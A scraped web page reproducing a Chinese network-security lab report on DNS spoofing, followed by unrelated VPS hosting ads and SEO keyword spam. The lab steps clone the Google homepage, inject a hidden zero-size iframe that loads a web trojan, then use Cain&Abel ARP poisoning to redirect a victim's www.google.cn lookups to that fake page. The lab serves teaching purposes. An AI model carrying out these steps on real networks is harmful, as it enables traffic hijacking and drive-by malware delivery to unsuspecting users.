如图【最新资料】DNS欺骗实验报告4-1

dns欺骗  时间:2021-03-16  阅读:()

实验5 DNS欺骗

实验任务一

1安装Cain&Abel

下载并运行"Cain&Abel v4.9.26"安装程序安装完毕后会弹出一个安装提示对话框要求安装WinPcap v4.0.2如图8-51所示。如果前面已经安装过就可以单击【Don't install】按钮取消WinP c ap的安装。

2制作假Google网页

用IE浏览器打开Google主页选择菜单栏中的【菜单】→【另存为】命令。在弹出的"另存为"对话框中指定保存路径设置"保存类型"为"网页全部"如图8-52所示。单击【确定】按钮保存生成名为"goog le.htm"的网页及相关图片文件夹"Goog le.files"。

用记事本打开"google.htm"文件并进行编辑在"<SCRIPT defer><!--//--></SCRIPT>"字符串前输入如下命令见图8-53 

1. <iframe src="http://192.168.1.198/index.htm" width=0 height=0></iframe>

上面的IP应该是192.168.1.8

然后保存网页的修改。

将"google.htm"和"Google.files"复制到刚才的"C:\web"文件夹中。运行"紫雨轩ASP Web服务器"将"缺省文件"设置为"goog le.htm"单击【保存】按钮完成设置。

在浏览器中输入本机的IP地址按【Enter】键后即可打开假Google网页并且网页中嵌入了网页木马如图8-54所示。

对于这种内嵌网页木马的方式杀毒软件不会给出警告但是我们可以从"紫雨轩ASPWeb服务器"的运行记录中看到木马实际上已经被执行了如图8-55所示。

3选择欺骗攻击目标

运行Cain&Abel v4.9.26单击工具栏上的【Start/Stop ARP】按钮如图8-56所示弹出设置对话框。

内网中的DNS欺骗强大的欺骗工具Cain 2

在其中选择自己用来嗅探的网卡需要选择能正确显示IP地址的网卡如图8-57所示。单击【确定】按钮后关闭对话框单击工具栏中的【Start/Stop Sniff】按钮再选择下方的"Sniffer"选项卡如图8-58所示。

单击工具栏中的【Add to List】按钮弹出"MAC Address Scanner"对话框如图8-59所示选择"All hosts in my subnet 本机所在子网中的所有主机 "单选按钮单击【确定】按钮后程序将自动扫描局域网中的所有在线主机。扫描结束后程序窗口列表中显示出扫描结果如图8-60所示。

选择"Sniffer"选项卡中窗口列表下方的"ARP"小选项卡切换到"ARP"页面。选择左侧目录树中的顶层"ARP"选项在右边的窗格列表空白处单击鼠标左键工具栏上的【Add toLis t】按钮被激活如图8-61所示。

单击【Add to list】按钮弹出"New ARP Poison Routing"对话框在对话框左边的列表中显示当前局域网中的IP地址。在列表中选择要进行欺骗的IP地址这里假设要欺骗的IP地址为"192.168.1.9"在右边选择被欺骗IP的目标网关如图8-62所示最后单击【确定】按钮关闭对话框在窗口列表中可以看到添加的欺骗主机如图8-63所示。

4DNS欺骗攻击

在"Sniffer"选项卡的"ARP"页面中选择左侧目录树中的"ARP-DNS"选项如图8-64所示在右边的窗格列表空白处单击鼠标左键激活工具栏上的【Add to List】按钮。

单击【Add to List】按钮弹出"DNS Spoofer for APR"对话框。在"DNS Name Requested请求DNS域名"文本框中输入要正常访问的网站这里为Goog le的网页"www.google.cn"然后在"IP adress to rewrite in response packets 改写响应数据包的IP地址 "文本框中输入本机的IP"192.168.1.8"如图8-65所示。

设置完成后单击【O K】按钮DNS欺骗将被添加到程序窗口列表中如图8-66所示。

经过设置后当被欺骗的主机访问Google的网页"http://w ww.go ogle.c n"时将会被Cain&Abel工具进行数据包捕获修改将其域名解析到攻击者指定的IP地址"192.168.1.8"的网页服务。用同样的方法添加局域网中的其他任意主机到攻击目标中并设置其欺骗域名与IP地址。

设置完毕后单击【Start/Stop ARP】按钮 DNS欺骗工作就开始了。此时指定的IP地址在访问"http://www.google.c n"时就会自动跳转到攻击者刚刚建立的假Google页面上。实验任务二、使用ARP防火墙

任务简要写出实验一的核心原理并截图(需要CAIN的设置图863及866)

需要说明各个计算机所扮演的角色以及数据流向各个计算机需要安装什么服务或者什么软件。

ReadyDedis:VPS全场5折,1G内存套餐月付2美元起,8个机房可选_服务器安装svn

ReadyDedis是一家2018年成立的国外VPS商家,由印度人开设,主要提供VPS和独立服务器租用等,可选数据中心包括美国洛杉矶、西雅图、亚特兰大、纽约、拉斯维加斯、杰克逊维尔、印度和德国等。目前,商家针对全部VPS主机提供新年5折优惠码,优惠后最低套餐1GB内存每月仅需2美元起,所有VPS均为1Gbps端口不限流量方式。下面列出几款主机配置信息。CPU:1core内存:1GB硬盘:25GB ...

[黑五]ProfitServer新加坡/德国/荷兰/西班牙VPS五折,不限流量KVM月付2.88美元起

ProfitServer已开启了黑色星期五的促销活动,一直到本月底,商家新加坡、荷兰、德国和西班牙机房VPS直接5折,无码直购最低每月2.88美元起,不限制流量,提供IPv4+IPv6。这是一家始于2003年的俄罗斯主机商,提供虚拟主机、VPS、独立服务器、SSL证书、域名等产品,可选数据中心包括俄罗斯、法国、荷兰、美国、新加坡、拉脱维亚、捷克、保加利亚等多个国家和地区。我们随便以一个数据中心为例...

宝塔面板企业版和专业版618年中活动 永久授权仅1888元+

我们一般的站长或者企业服务器配置WEB环境会用到免费版本的宝塔面板。但是如果我们需要较多的付费插件扩展,或者是有需要企业功能应用的,短期来说我们可能选择按件按月付费的比较好,但是如果我们长期使用的话,有些网友认为选择宝塔面板企业版或者专业版是比较划算的。这样在年中大促618的时候,我们也可以看到宝塔面板也有发布促销活动。企业版年付899元,专业版永久授权1888元起步。对于有需要的网友来说,还是值...

dns欺骗为你推荐
站酷zcool有什么很好的平面设计如ZCOOL这种的好网站?巨星prince去世作者为什么把伏尔泰的逝世说成是巨星陨落比肩工场比肩成局 什么意思地陷裂口山崩地裂的意思rawtools闪迪32Gsd卡,无法格式化,显示只有30M,并且是raw格式。如何恢复?长尾关键词挖掘工具怎么挖掘长尾关键词,可以批量操作的那种www.5any.com重庆哪里有不是全日制的大学?javbibinobibi的中文意思是?斗城网女追男有多易?喜欢你,可我不知道你喜不喜欢我!!平安夜希望有他陪我过lcoc.top服装英语中double topstitches什么意思
org域名 快速域名备案 如何查询域名备案号 免费顶级域名 mobaxterm 合肥鹏博士 最好的空间 工作站服务器 php空间推荐 183是联通还是移动 徐正曦 hdd 厦门电信 四川电信商城 我的世界服务器ip lamp怎么读 卡巴斯基官网下载 万网服务器 上海联通 accountsuspended 更多